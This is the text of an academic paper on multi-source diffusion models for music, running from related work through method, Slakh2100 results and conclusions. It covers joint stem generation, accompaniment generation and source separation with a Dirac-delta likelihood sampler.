Deep generative models for audio learn, directly or implicitly, the distribution of mixtures, represented in our notation by \( p(y) \), possibly conditioning on additional data such as text. Various general-purpose generative models, such as autoregressive models, GANs (Donahue et al., 2019), and diffusion models, have been adapted for use in the audio field. Autoregressive models are well-established in audio modeling (van den Oord et al., 2016). Jukebox (Dhariwal et al., 2020) proposed to model musical tracks with Scalable Transformers (Vaswani et al., 2017) on hierarchical discrete representations obtained through VQ-VAEs (van den Oord et al., 2017). Furthermore, using a lyrics conditioner, this method generated tracks with vocals following the text. However, while Jukebox could model longer sequences in latent space, the audio output suffered from quantization artifacts. Newer latent autoregressive models (Borsos et al., 2023; Kreuk et al., 2023) can handle extended contexts, produce more coherent generations, and, by incorporating residual quantization (Zeghidour et al., 2021), output more natural-sounding samples. State-of-the-art latent autoregressive models for music, such as MusicLM (Agostinelli et al., 2023), can guide generation by conditioning on textual embeddings obtained via large-scale contrastive pre-training (Manco et al., 2022; Huang et al., 2022). MusicLM can also input a melody and condition on text for style transfer. A concurrent work, SingSong (Donahue et al., 2023), introduces vocal-to-mixture accompaniment generation. Our accompaniment generation procedure differs from the latter since we perform generation at the stem level in a composable way, while the former outputs a single mixture.

DiffWave (Kong et al., 2021) and WaveGrad (Chen et al., 2021) were the first diffusion (score-based) generative models in audio, tackling speech synthesis. Many subsequent models followed these preliminary works, mainly conditioned to solve particular tasks such as speech enhancement (Lu et al., 2021; Serrà et al., 2022; Sawata et al., 2023; Saito et al., 2023), audio upsampling (Lee & Han, 2021; Yu et al., 2023), MIDI-to-waveform (Mittal et al., 2021; Hawthorne et al., 2022), or spectrogram-to-MIDI generation (Cheuk et al., 2023). The first work on source-specific generation with diffusion models is CRASH (Rouard & Hadjeres, 2021). Yang et al. (2023), Pascual et al. (2023), and Liu et al. (2023) proposed text-conditioned diffusion models to generate general sounds, not focusing on restricted classes such as speech or music. Closer to our work, diffusion models targeting the musical domain are Riffusion (Forsgren & Martiros, 2022) and Moûsai (Schneider et al., 2023). Riffusion fine-tunes Stable Diffusion (Rombach et al., 2022), a large pre-trained text-conditioned vision diffusion model, over STFT magnitude spectrograms. Moûsai performs generation in a latent domain, resulting in context lengths that surpass one minute. Our score network follows the design of the U-Net proposed in Moûsai, albeit using the waveform data representation.
#### 2.2 AUDIO SOURCE SEPARATION

Existing audio source separation models can be broadly classified into deterministic and generative. Deterministic source separators are parametric models that input the mixtures and systematically extract one or all sources. These models are typically trained with a regression loss (Gusó et al., 2022) on the estimated signal, represented as a waveform (Lluís et al., 2019; Luo & Mesgarani, 2019; Défossez et al., 2019), an STFT (Takahashi et al., 2018; Choi et al., 2021), or both (Défossez, 2021). On the other hand, generative source separation models based on (independent) Bayesian inference learn a prior model for each source, thus targeting the distributions \( \{p_n(x_n)\}_{n=1,...,N} \). The mixture is observed only during inference, where a likelihood function connects it to its constituent sources. The literature has explored different priors, such as GANs (Subakan & Smaragdis, 2018; Kong et al., ...).

Figure 2: Inference tasks with MSDM. Oblique lines represent the presence of noise in the signal, decreasing from left to right, with the highest noise level at time $T$ when we start the sampling procedure. Top-left: We generate all stems in a mixture, obtaining a total generation. Bottom-left: We perform partial generation (source imputation) by fixing the sources $x_1$ (Bass) and $x_3$ (Piano) and generating the other two sources $\hat{x}_2(0)$ (Drums) and $\hat{x}_4(0)$ (Guitar). We denote with $x_1(t)$ and $x_3(t)$ the noisy stems obtained from $x_1$ and $x_3$ via the perturbation kernel in Eq. (1). Right: We perform source separation by conditioning the prior with a mixture $y$, following Algorithm 1.

The separation method closest to ours is NCSN-BASIS (Jayaram & Thickstun, 2020). This method was proposed for image source separation, using Langevin dynamics to separate the mixtures with an NCSN score-based model. It employs a Gaussian likelihood function during inference, which, as we demonstrate experimentally, is sub-optimal compared to our novel Dirac-based likelihood function. The main difference between our method and other generative source separation methods (including NCSN-BASIS) is the modeling of the full joint distribution. As such, we can perform source separation and synthesize mixtures or subsets of stems with a single model.

Contextual information between sources is explicitly modeled in Manilow et al. (2022) and Postolache et al. (2023b). The first work models the relationship between sources by training an orderless NADE estimator, which predicts a subset of the sources while conditioning on the input mixture and the remaining sources. The subsequent study achieves universal source separation (Kavalerov et al., 2019; Wisdom et al., 2020) through adversarial training, utilizing a context-based discriminator to model the relationship between sources. Both methods are deterministic and conditioned on the mixtures architecturally. The same architectural limitation is present in diffusion-based (Scheibler et al., 2023; Lutati et al., 2023) or diffusion-inspired (Plaja-Roglans et al., 2022) conditional approaches. Our method sets itself apart as it proposes a model that is not constrained architecturally by a mixture conditioner, so we can also perform unconditional generation.

### 3 BACKGROUND

The foundation of our model lies in estimating the joint distribution of the sources \( p(x_1, \ldots, x_N) \). Our approach is generative because we model an unconditional distribution (the prior). The different tasks are then solved at inference time, exploiting the prior.
We employ a diffusion-based (Sohl-Dickstein et al., 2015; Ho et al., 2020) generative model trained via denoising score-matching (Song & Ermon, 2019) to learn the prior. Specifically, we present our formalism by utilizing the notation and assumptions established in Karras et al. (2022). The central idea of score-matching (Hyvärinen, 2005; Kingma & LeCun, 2010; Vincent, 2011) is to approximate the “score” function of the target distribution \( p(x) \), namely \( \nabla_x \log p(x) \), rather than the distribution itself. To effectively approximate the score in sparse data regions, denoising diffusion methods introduce controlled noise to the data and learn to remove it. Formally, the data distribution is perturbed with a Gaussian perturbation kernel:

$$ p(x(t) \mid x(0)) = \mathcal{N}(x(t); x(0), \sigma^2(t)I), \quad (1) $$

where the parameter \( \sigma(t) \) regulates the degree of noise added to the data. Following Karras et al. (2022), we consider an optimal schedule given by \( \sigma(t) = t \). With that choice of \( \sigma(t) \), the forward evolution of a data point \( x(t) \) in time is described by a probability flow ODE (Song et al., 2021):

$$ dx(t) = -\sigma(t)\nabla_{x(t)} \log p(x(t)) \, dt. \quad (2) $$

For \( t = T \gg 0 \), a data point \( x(T) \) is approximately distributed according to a Gaussian distribution \( \mathcal{N}(x(t); 0, \sigma^2(T)I) \), from which sampling is straightforward. Eq. (2) can be inverted in time, resulting in the following backward ODE that describes the denoising process:

$$ dx(t) = \sigma(t)\nabla_{x(t)} \log p(x(t)) \, dt. \quad (3) $$

Sampling can be performed by integrating Eq. (3) with a standard ODE solver, starting from an initial (noisy) sample drawn from \( \mathcal{N}(x(t); 0, \sigma^2(T)I) \). The score function is approximated by a neural network \( S^\theta(x(t), \sigma(t)) \), minimizing the following score-matching loss:

$$ \mathbb{E}_{t \sim U([0,T])} \mathbb{E}_{x(0) \sim p(x(0))} \mathbb{E}_{x(t) \sim p(x(t)\mid x(0))} \| S^\theta(x(t), \sigma(t)) - \nabla_{x(t)} \log p(x(t) \mid x(0)) \|_2^2. $$

By expanding \( p(x(t) \mid x(0)) \) with Eq. (1), the score-matching loss simplifies to:

$$ \mathbb{E}_{t \sim U([0,T])} \mathbb{E}_{x(0) \sim p(x(0))} \mathbb{E}_{\epsilon \sim \mathcal{N}(0, \sigma^2(t)I)} \| D^\theta(x(0) + \epsilon, \sigma(t)) - x(0) \|_2^2, $$

where we define \( S^\theta(x(t), \sigma(t)) := (D^\theta(x(t), \sigma(t)) - x(t))/\sigma^2(t) \).

### 4 Method

#### 4.1 Multi-Source Audio Diffusion Models

In our setup, we have \( N \) distinct source waveforms \( \{x_1, \ldots, x_N\} \) with \( x_n \in \mathbb{R}^D \) for each \( n \). The sources coherently sum to a mixture \( y = \sum_{n=1}^{N} x_n \). We also use the aggregated form \( x = (x_1, \ldots, x_N) \in \mathbb{R}^{N \times D} \). In this setting, multiple tasks can be performed: one may generate a consistent mixture \( y \) or separate the individual sources \( x \) from a given mixture \( y \). We refer to the first task as generation and to the second as source separation. A subset of sources can also be fixed in the generation task, and the others can be generated consistently. We call this task partial generation or source imputation. Our key contribution is the ability to perform all these tasks simultaneously by training a single multi-source diffusion model (MSDM), capturing the prior \( p(x_1, \ldots, x_N) \).
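For illustration, a minimal PyTorch sketch of the simplified training objective above, applied to the stacked sources \( x = (x_1, \ldots, x_N) \), could look as follows. This is our own simplification, not the paper's training code: the function name and the value of \( \sigma_{\max} \) are assumptions, \( t \) is drawn uniformly, and the loss weighting and network preconditioning of Karras et al. (2022) are omitted.

```python
import torch

def msdm_training_loss(denoiser, x0, sigma_max=80.0):
    """Denoising score-matching loss with sigma(t) = t.

    x0: clean stacked sources, shape (batch, N_sources, length).
    denoiser: network D_theta(x, sigma); the score is then recovered as
    S_theta(x, sigma) = (D_theta(x, sigma) - x) / sigma**2.
    """
    batch = x0.shape[0]
    t = torch.rand(batch, device=x0.device) * sigma_max   # t ~ U([0, T])
    sigma = t.view(batch, *([1] * (x0.dim() - 1)))        # broadcastable sigma(t) = t
    noise = torch.randn_like(x0) * sigma                  # eps ~ N(0, sigma(t)^2 I)
    return ((denoiser(x0 + noise, t) - x0) ** 2).mean()   # || D(x0 + eps) - x0 ||^2
```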
The model, illustrated in Figure 1, approximates the noisy score function:

$$ \nabla_{x(t)} \log p(x(t)) = \nabla_{(x_1(t), \ldots, x_N(t))} \log p(x_1(t), \ldots, x_N(t)), $$

with a neural network:

$$ S^\theta(x(t), \sigma(t)) : \mathbb{R}^{N \times D} \times \mathbb{R} \rightarrow \mathbb{R}^{N \times D}, \quad (4) $$

where \( x(t) = (x_1(t), \ldots, x_N(t)) \) denotes the sources perturbed with the Gaussian kernel in Eq. (1). We describe the three tasks (illustrated in Figure 2) using the prior distribution:

- **Total Generation.** This task requires generating a plausible mixture \( y \). It can be achieved by sampling the sources \( \{x_1, \ldots, x_N\} \) from the prior distribution and summing them to obtain the mixture \( y \).
- **Partial Generation.** Given a subset of sources, this task requires generating a plausible accompaniment. We define the subset of fixed sources as \( x_I \) and generate the remaining sources \( x_{\neg I} \) by sampling from the conditional distribution \( p(x_{\neg I} \mid x_I) \).
- **Source Separation.** Given a mixture \( y \), this task requires isolating the individual sources that compose it. It can be achieved by sampling from the posterior distribution \( p(x \mid y) \).

#### 4.2 Inference

The three tasks of our method are solved during inference by discretizing the backward Eq. (3). Although different tasks require distinct score functions, they all originate directly from the prior score function in Eq. (4). We analyze each of these score functions in detail. For more details on the discretization method, refer to Section C.3.

**Algorithm 1** ‘MSDM Dirac’ sampler for source separation.

Require: \( I \) number of discretization steps for the ODE, \( R \) number of corrector steps, \( \{\sigma_i\}_{i \in \{0,\ldots,I\}} \) noise schedule, \( S_{\text{churn}} \)
1: Initialize \( \hat{x} \sim \mathcal{N}(0, \sigma_I^2 I) \)
2: \( \alpha \leftarrow \min(S_{\text{churn}}/I, \sqrt{2} - 1) \)
3: for \( i \leftarrow I \) to \( 1 \) do
4:   for \( r \leftarrow R \) to \( 0 \) do
5:     \( \hat{\sigma} \leftarrow \sigma_i \cdot (\alpha + 1) \)
6:     \( \epsilon \sim \mathcal{N}(0, I) \)
7:     \( \hat{x} \leftarrow \hat{x} + \sqrt{\hat{\sigma}^2 - \sigma_i^2}\, \epsilon \)
8:     \( z \leftarrow [\hat{x}_{1:N-1},\, y - \sum_{n=1}^{N-1} \hat{x}_n] \)
9:     for \( n \leftarrow 1 \) to \( N - 1 \) do
10:      \( g_n \leftarrow S_n^\theta(z, \hat{\sigma}) - S_N^\theta(z, \hat{\sigma}) \)
11:    end for
12:    \( g \leftarrow [g_1, \ldots, g_{N-1}] \)
13:    \( \hat{x}_{1:N-1} \leftarrow \hat{x}_{1:N-1} + (\sigma_{i-1} - \hat{\sigma})\, g \)
14:    \( \hat{x} \leftarrow [\hat{x}_{1:N-1},\, y - \sum_{n=1}^{N-1} \hat{x}_n] \)
15:    if \( r > 0 \) then
16:      \( \epsilon \sim \mathcal{N}(0, I) \)
17:      \( \hat{x} \leftarrow \hat{x} + \sqrt{\sigma_i^2 - \sigma_{i-1}^2}\, \epsilon \)
18:    end if
19:  end for
20: end for
21: return \( \hat{x} \)

#### 4.2.1 Total Generation

The total generation task is performed by sampling from Eq. (3) using the score function in Eq. (4). The mixture is then obtained by summing over all the generated sources.
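A minimal sketch of this sampling loop follows (our own illustration: a plain Euler discretization of the backward ODE in Eq. (3), without the \( S_{\text{churn}} \) noise injection and correction steps of Algorithm 1; the schedule, step count, and function names are assumptions):

```python
import torch

@torch.no_grad()
def generate_sources(score_fn, n_sources, length, steps=150,
                     sigma_max=80.0, sigma_min=1e-3):
    """Euler integration of the probability flow ODE with sigma(t) = t,
    i.e. dx/dsigma = -sigma * score, run from sigma_max down to sigma_min.

    score_fn(x, sigma) approximates grad_x log p(x(t)) and returns a
    tensor with the same shape as x."""
    sigmas = torch.linspace(sigma_max, sigma_min, steps + 1)
    x = torch.randn(1, n_sources, length) * sigmas[0]   # x(T) ~ N(0, sigma_T^2 I)
    for sigma, sigma_next in zip(sigmas[:-1], sigmas[1:]):
        d = -sigma * score_fn(x, sigma)                 # ODE direction at this noise level
        x = x + (sigma_next - sigma) * d                # Euler step toward lower noise
    mixture = x.sum(dim=1)                              # y = sum of the generated stems
    return x, mixture
```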
To do so, we estimate the gradient of the conditional distribution:

$$\nabla_{x_{\overline{\mathcal{I}}}(t)} \log p(x_{\overline{\mathcal{I}}}(t) \mid x_{\mathcal{I}}(t)).$$ (5)

This falls into the setting of imputation or, as it is more widely known in the image domain, inpainting. We approach imputation using the method in (Song et al., 2021). The gradient in Eq. (5) is approximated as follows:

$$\nabla_{x_{\overline{\mathcal{I}}}(t)} \log p([x_{\overline{\mathcal{I}}}(t), \hat{x}_{\mathcal{I}}(t)]),$$

where $\hat{x}_{\mathcal{I}}$ is a sample from the forward process: $\hat{x}_{\mathcal{I}}(t) \sim \mathcal{N}(\hat{x}_{\mathcal{I}}(t); x_{\mathcal{I}}(0), \sigma^2(t) I)$. The square bracket operator denotes concatenation. Approximating the score function, we write:

$$\nabla_{x_{\overline{\mathcal{I}}}(t)} \log p(x_{\overline{\mathcal{I}}}(t) \mid x_{\mathcal{I}}(t)) \approx S^\theta_{\overline{\mathcal{I}}}([x_{\overline{\mathcal{I}}}(t), \hat{x}_{\mathcal{I}}(t)], \sigma(t)),$$

where $S^\theta_{\overline{\mathcal{I}}}$ denotes the entries of the score network corresponding to the sources indexed by $\overline{\mathcal{I}}$.

4.2.3 Source Separation

We view source separation as a specific instance of conditional generation, where we condition the generation process on the given mixture $y = y(0)$. This requires computing the score function of the posterior distribution:

$$\nabla_{x(t)} \log p(x(t) \mid y(0)).$$ (6)

Standard methods for implementing conditional generation with diffusion models either estimate the posterior score in Eq. (6) directly at training time (i.e., Classifier-Free Guidance (Ho & Salimans, 2021)) or estimate the likelihood function $p(y(0) \mid x(t))$ and use Bayes' formula to derive the posterior. The second approach typically involves training a separate model, often a classifier, for the likelihood score (i.e., Classifier Guidance (Dhariwal & Nichol, 2021)).

In diffusion-based generative source separation, learning a likelihood model is typically unnecessary because the relationship between $x(t)$ and $y(t)$ is represented by a simple function, namely the sum. A natural approach is to model the likelihood function based on this functional dependency. This is the approach taken by Jayaram & Thickstun (2020), who use a Gaussian likelihood function:

$$p(y(t) \mid x(t)) = \mathcal{N}\Big(y(t); \sum_{n=1}^{N} x_n(t), \gamma^2(t) I\Big),$$

with the standard deviation given by a hyperparameter $\gamma(t)$. The authors argue that aligning the $\gamma(t)$ value to be proportionate to $\sigma(t)$ optimizes the outcomes of their NCSN-BASIS separator.

We present a novel approximation of the posterior score function in Eq. (6) by modeling $p(y(t) \mid x(t))$ as a Dirac delta function centered at $\sum_{n=1}^{N} x_n(t)$:

$$p(y(t) \mid x(t)) = \delta\Big(y(t) - \sum_{n=1}^{N} x_n(t)\Big).$$

The complete derivation can be found in Appendix A; here we present only the final formulation, which we call ‘MSDM Dirac’. The method constrains a source, without loss of generality $x_N$, by setting $x_N(t) = y(0) - \sum_{n=1}^{N-1} x_n(t)$ and estimates:

$$\nabla_{x_m(t)} \log p(x(t) \mid y(0)) \approx S_m^\theta\Big(\big(x_1(t), \ldots, x_{N-1}(t), y(0) - \sum_{n=1}^{N-1} x_n(t)\big), \sigma(t)\Big) - S_N^\theta\Big(\big(x_1(t), \ldots, x_{N-1}(t), y(0) - \sum_{n=1}^{N-1} x_n(t)\big), \sigma(t)\Big),$$

where $1 \leq m \leq N - 1$ and $S_m^\theta, S_N^\theta$ denote the entries of the score network corresponding to the $m$-th and $N$-th sources.
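This estimator plugs directly into the Euler integrator of Algorithm 1. Below is a minimal sketch, assuming a score network `score(z, sigma) -> (N, D)` over the $N$ stacked sources and a noise schedule `sigmas` increasing from $\sigma_0 \approx 0$ to $\sigma_I$; it illustrates the sampler, and is not the authors' implementation.

```python
import torch

@torch.no_grad()
def msdm_dirac_separate(score, y, N, sigmas, R=0, s_churn=0.0):
    """Sketch of Algorithm 1 ('MSDM Dirac'). y: (D,) observed mixture;
    sigmas: list with sigma_0 ~ 0 < ... < sigma_I; R corrector steps."""
    I = len(sigmas) - 1
    x = torch.randn(N, y.shape[0]) * sigmas[I]            # x ~ N(0, sigma_I^2 I)
    alpha = min(s_churn / I, 2 ** 0.5 - 1)
    for i in range(I, 0, -1):
        for r in range(R, -1, -1):
            s_hat = sigmas[i] * (alpha + 1)               # "churned" noise level
            x = x + (s_hat ** 2 - sigmas[i] ** 2) ** 0.5 * torch.randn_like(x)
            x[N - 1] = y - x[: N - 1].sum(dim=0)          # enforce the mixture constraint
            s = score(x, s_hat)
            g = s[: N - 1] - s[N - 1]                     # Dirac posterior score, as above
            x[: N - 1] = x[: N - 1] + (sigmas[i - 1] - s_hat) * g
            x[N - 1] = y - x[: N - 1].sum(dim=0)
            if r > 0:                                     # corrector: re-noise to sigma_i
                x = x + (sigmas[i] ** 2 - sigmas[i - 1] ** 2) ** 0.5 * torch.randn_like(x)
    return x
```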
Our approach models the limiting case wherein $\gamma(t) \to 0$ in the Gaussian likelihood function. This represents a scenario where the functional dependence between $x(t)$ and $y(t)$ becomes increasingly tight, thereby sharpening the conditioning on the given mixture during the generation process. The pseudo-code for the ‘MSDM Dirac’ source separation sampler, using the Euler ODE integrator of (Karras et al., 2022), is provided in Algorithm 1. The Euler ODE discretization logic uses the $S_{\text{churn}}$ mechanism of (Karras et al., 2022) and optional correction steps (Song et al., 2021) (see Section C.3 for more details).

The separation procedure can additionally be employed in the weakly-supervised source separation scenario, typically encountered in generative source separation (Jayaram & Thickstun, 2020; Zhu et al., 2022; Postolache et al., 2023). This scenario pertains to cases where we know that specific audio data belongs to a particular instrument class while not having access to sets of sources sharing a context. To adapt to this scenario, we assume independence between sources, $p(x_1, \ldots, x_N) = \prod_{n=1}^{N} p_n(x_n)$, and train a separate model for each source class. We call the resulting model ‘Independent Source Diffusion Model with Dirac Likelihood’ (‘ISDM Dirac’). We derive its formula together with formulas for the Gaussian versions ‘MSDM Gaussian’ and ‘ISDM Gaussian’ in Appendix B.

5 EXPERIMENTAL RESULTS

We experiment on Slakh2100 (Manilow et al., 2019), a standard dataset for music source separation. We chose Slakh2100 because it has a significantly larger quantity of data (145h) than other multi-source waveform datasets like MUSDB18-HQ (Rafii et al., 2019) (10h). The amount of data plays a decisive role in determining the quality of a generative model, making Slakh2100 a preferable choice. Nevertheless, in Appendix E we conduct a study of data efficiency on MUSDB18-HQ. Details on datasets, architecture, training, and sampling are provided in Appendix C.

5.1 MUSIC GENERATION

The performance of MSDM on the generative tasks is tested through subjective and objective evaluation.

Table 1: Comparison between the total generation capabilities of MSDM (Slakh2100) and an equivalent architecture trained on Slakh2100 mixtures. Both subjective (quality and coherence, higher is better) and objective (FAD, lower is better) evaluations are shown. The quality and coherence columns refer to the average scores of the listening tests, with respective variances.

| Model | FAD ↓ | Quality ↑ | Coherence ↑ |
|----------------|-------|-----------|-------------|
| MSDM | 6.55 | 6.51 ± 2.19 | 6.35 ± 2.36 |
| Mixture Model | 6.67 | 6.15 ± 2.47 | 5.67 ± 2.60 |

Table 2: Quantitative and qualitative results for the partial generation task on Slakh2100. We use both subjective (quality and density, higher is better) and objective (sub-FAD, lower is better) evaluation metrics. The sub-FAD metric is reported for all combinations of generated sources (B: Bass, D: Drums, G: Guitar, P: Piano). The quality and density columns refer to the average scores of the listening tests, with respective variances.
| Slakh2100 | B | D | G | P | BD | BG | BP | DG | DP | GP | BDG | BDP | BGP | DGP | Quality ↑ | Density ↑ |
|-----------|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----------|-----------|
| MSDM | 0.45 | 1.09 | 0.11 | 0.76 | 2.09 | 1.00 | 2.32 | 1.45 | 1.82 | 1.65 | 2.93 | 3.30 | 4.90 | 3.10 | 6.3 ± 2.7 | 6.1 ± 2.6 |

Subjective evaluation is done through listening tests, whose format is reported in Appendix F. Concisely, we produce two forms, one for total generation and one for partial generation. In the first, subjects are asked to rate, from 1 to 10, the quality and instrument coherence (i.e., how plausible the instruments sound together) of 30 generated chunks, of which 15 are generated by MSDM and 15 by a model trained on mixtures (using the same diffusion architecture as MSDM). In the second, knowing the fixed instruments, subjects are asked to rate, from 1 to 10, the quality and the density of the generated accompaniment. Namely, ‘quality’ tests how plausible the full chunk sounds with respect to the ground-truth data, and ‘density’ tests how much the generated instruments are present in the chunk. We also provide examples of music and accompaniment generation online.¹

For the objective evaluation of the generative tasks, we generalize the FAD protocol in Donahue et al. (2023) to our total and partial generation tasks with more than one source. Given $D_{\text{real}}$, a dataset of ground-truth mixture chunks, and $\mathcal{I}$, a set indexing the conditioning sources ($\emptyset$ for total generation), we build a dataset $D_{\text{gen}}$ whose elements are the sum of the conditioning sources (indexed by $\mathcal{I}$) and the respective generated sources. We define the sub-FAD as $\text{FAD}(D_{\text{real}}, D_{\text{gen}})$. We use VGGish embeddings (Hershey et al., 2017) for computing the metric.

Results for total and partial generation are reported in Tables 1 and 2 respectively, both for subjective and objective evaluations. Results in Table 1 show a minimal difference between the model trained on mixtures and MSDM. This suggests that, given the same dataset and architecture, the generative power of MSDM matches that of the model trained on mixtures, while additionally being able to perform separation and partial generation. The subjective results in Table 2 show that the task of partial generation can be performed with non-trivial quality. Being the first method able to generate any combination of partial sources, ours has no competitor baseline for the objective metrics. We thus report the sub-FAD results of our method as baseline metrics for future research.

5.2 Source Separation

In order to evaluate source separation, we use the scale-invariant SDR improvement (SI-SDR$_I$) metric (Roux et al., 2019). The SI-SDR between a ground-truth source $x_n$ and an estimate $\hat{x}_n$ is defined as:

$$\text{SI-SDR}(x_n, \hat{x}_n) = 10 \log_{10} \frac{\|\alpha x_n\|^2 + \epsilon}{\|\alpha x_n - \hat{x}_n\|^2 + \epsilon},$$

where $\alpha = \frac{x_n^T \hat{x}_n + \epsilon}{\|x_n\|^2 + \epsilon}$ and $\epsilon = 10^{-8}$. The improvement with respect to the mixture baseline is defined as $\text{SI-SDR}_I = \text{SI-SDR}(x_n, \hat{x}_n) - \text{SI-SDR}(x_n, y)$. On Slakh, we compare our supervised (MSDM) and weakly-supervised (ISDM) separators with the ‘Demucs’ (Défossez et al., 2019) and ‘Demucs + Gibbs (512 steps)’ regressor baselines from Manilow et al.
¹https://gladia-research-group.github.io/multi-source-diffusion-models/

Table 3: Quantitative results for source separation on the Slakh2100 test set. We use the SI-SDR$_I$ as our evaluation metric (dB – higher is better). We present both the supervised (‘MSDM Dirac’, ‘MSDM Gaussian’) and weakly-supervised (‘ISDM Dirac’, ‘ISDM Gaussian’) separators and specify if a correction step is used. ‘All’ reports the average over the four stems.

| Model | Bass | Drums | Guitar | Piano | All |
|------------------------------|------|-------|--------|-------|-----|
| Demucs (Défossez et al., 2019; Manilow et al., 2022) | 15.77 | 19.44 | 15.30 | 13.92 | 16.11 |
| Demucs + Gibbs (512 steps) (Manilow et al., 2022) | 17.16 | 19.61 | **17.82** | **16.32** | **17.73** |
| **Dirac Likelihood** | | | | | |
| ISDM | 18.44 | 20.19 | 13.34 | 13.25 | 16.30 |
| ISDM (correction) | **19.36** | **20.90** | 14.70 | 14.13 | 17.27 |
| MSDM | 16.21 | 17.47 | 12.71 | 13.29 | 14.92 |
| MSDM (correction) | 17.12 | 18.68 | 15.38 | 14.73 | 16.48 |
| **Gaussian Likelihood** (Jayaram & Thickstun, 2020) | | | | | |
| ISDM | 13.48 | 18.09 | 11.93 | 11.17 | 13.67 |
| ISDM (correction) | 14.27 | 19.10 | 12.74 | 12.20 | 14.58 |
| MSDM | 12.53 | 16.82 | 12.98 | 9.29 | 12.90 |
| MSDM (correction) | 13.93 | 17.92 | 14.19 | 12.11 | 14.54 |

(2022), the state-of-the-art for supervised music source separation on Slakh2100, aligning with the evaluation procedure of Manilow et al. (2022). We evaluate over the test set of Slakh2100, using chunks of 4 seconds in length (with an overlap of two seconds) and filtering out silent chunks and chunks consisting of only one source, given the poor performance of SI-SDR$_I$ on such segments.

We report results comparing our Dirac score posterior with the Gaussian score posterior of (Jayaram & Thickstun, 2020), using the best parameters of the ablations in Appendix D and 150 inference steps. Results are reported in Table 3 and show that: (i) the Dirac likelihood improves overall results, even outperforming the state of the art when applied to ISDM on Bass and Drums; (ii) adding a correction step is beneficial; (iii) MSDM with Dirac likelihood and one step of correction gives results comparable with the state of the art and superior to standard Demucs overall. We stress again that, while the baselines can perform the separation task alone, MSDM can also perform generative tasks.

6 CONCLUSIONS

We have presented a general method, based on denoising score-matching, for source separation, mixture generation, and accompaniment generation in the musical domain. Our approach utilizes a single neural network trained once, with tasks differentiated during inference. Moreover, we have defined a new sampling method for source separation. We quantitatively tested the model on source separation, obtaining results comparable to state-of-the-art regressor models. We qualitatively and quantitatively tested the model on total and partial generation. Our model’s ability to handle both total and partial generation and source separation positions it as a significant step toward the development of general audio models. This flexibility paves the way for more advanced music composition tools, where users can easily control and manipulate individual sources within a mixture.

6.1 LIMITATIONS AND FUTURE WORK

The amount of available contextual data constrains the performance of our model. To address this, pre-separating mixtures and training on the separations, as demonstrated in (Donahue et al., 2023), may prove beneficial.
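As an aside on evaluation, the SI-SDR metric of Section 5.2 is only a few lines of NumPy. A sketch, with $\alpha$ and $\epsilon$ exactly as defined there:

```python
import numpy as np

def si_sdr(x, x_hat, eps=1e-8):
    """SI-SDR(x, x_hat), with alpha = (x^T x_hat + eps) / (||x||^2 + eps)."""
    alpha = (np.dot(x, x_hat) + eps) / (np.dot(x, x) + eps)
    return 10 * np.log10((np.sum((alpha * x) ** 2) + eps)
                         / (np.sum((alpha * x - x_hat) ** 2) + eps))

def si_sdr_improvement(x, x_hat, y):
    """SI-SDR_I: improvement of the estimate over the mixture baseline y."""
    return si_sdr(x, x_hat) - si_sdr(x, y)
```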
Additionally, it would be intriguing to explore the possibility of extending our method to situations where the sub-signals are not related by addition but rather by a known but different function. Finally, future work could adapt the model to jointly model MIDI information (for example, extracted from sources (Lin et al., 2021)) for further control.

ACKNOWLEDGEMENTS

The authors were partially supported by the ERC grant no. 802554 (SPECGEO), PRIN 2020 project no. 2020TA3K9N (LEGO.AI), PRIN 2022 project no. 2022AL45R2 (EYE-FI.AI, CUP H53D2300350-0001), and PNRR MUR project no. PE0000013-FAIR.

REFERENCES

Andrea Agostinelli, Timo I Denk, Zalán Borsos, Jesse Engel, Mauro Verzetti, Antoine Caillon, Qingqing Huang, Aren Jansen, Adam Roberts, Marco Tagliasacchi, et al. Musiclm: Generating music from text. *arXiv preprint arXiv:2301.11325*, 2023.

Zalán Borsos, Raphaël Marinier, Damien Vincent, Eugene Kharitonov, Olivier Pietquin, Matt Sharifi, Dominik Roblek, Olivier Teboul, David Grangier, Marco Tagliasacchi, et al. Audiolm: a language modeling approach to audio generation. *IEEE/ACM Transactions on Audio, Speech, and Language Processing*, 2023.

Nanxin Chen, Yu Zhang, Heiga Zen, Ron J Weiss, Mohammad Norouzi, and William Chan. Wavegrad: Estimating gradients for waveform generation. In *International Conference on Learning Representations*, 2021. URL https://openreview.net/forum?id=NsMLjcFaO8O.

Kin Wai Cheuk, Ryosuke Sawata, Toshimitsu Uesaka, Naoki Murata, Naoya Takahashi, Shusuke Takahashi, Dorien Herremans, and Yuki Mitsufuji. Diffroll: Diffusion-based generative music transcription with unsupervised pretraining capability. In *ICASSP 2023-2023 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP)*, pp. 1–5. IEEE, 2023.

Woosung Choi, Minseok Kim, Jaehwa Chung, and Soonyoung Jung. LaSAFT: Latent source attentive frequency transformation for conditioned source separation. In *ICASSP 2021-2021 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP)*, pp. 171–175. IEEE, 2021.

Alexandre Défossez. Hybrid spectrogram and waveform source separation. In *Proceedings of the ISMIR 2021 Workshop on Music Source Separation*, 2021.

Alexandre Défossez, Nicolas Usunier, Léon Bottou, and Francis Bach. Music source separation in the waveform domain. *arXiv preprint arXiv:1911.13254*, 2019.

Prafulla Dhariwal and Alexander Nichol. Diffusion models beat gans on image synthesis. In M. Ranzato, A. Beygelzimer, Y. Dauphin, P.S. Liang, and J. Wortman Vaughan (eds.), *Advances in Neural Information Processing Systems*, volume 34, pp. 8780–8794. Curran Associates, Inc., 2021. URL https://proceedings.neurips.cc/paper/2021/file/49ad23d1ec9fa4bd8d77d02681df5cfa-Paper.pdf.

Prafulla Dhariwal, Heewoo Jun, Christine Payne, Jong Wook Kim, Alec Radford, and Ilya Sutskever. Jukebox: A generative model for music. *arXiv preprint arXiv:2005.00341*, 2020.

Chris Donahue, Julian McAuley, and Miller Puckette. Adversarial audio synthesis. In *International Conference on Learning Representations*, 2019.

Chris Donahue, Antoine Caillon, Adam Roberts, Ethan Manilow, Philippe Esling, Andrea Agostinelli, Mauro Verzetti, Ian Simon, Olivier Pietquin, Neil Zeghidour, et al. Singsong: Generating musical accompaniments from singing. *arXiv preprint arXiv:2301.12662*, 2023. URL https://arxiv.org/abs/2301.12662.

Seth* Forsgren and Hayk* Martiros. Riffusion - Stable diffusion for real-time music generation, 2022. URL https://riffusion.com/about.
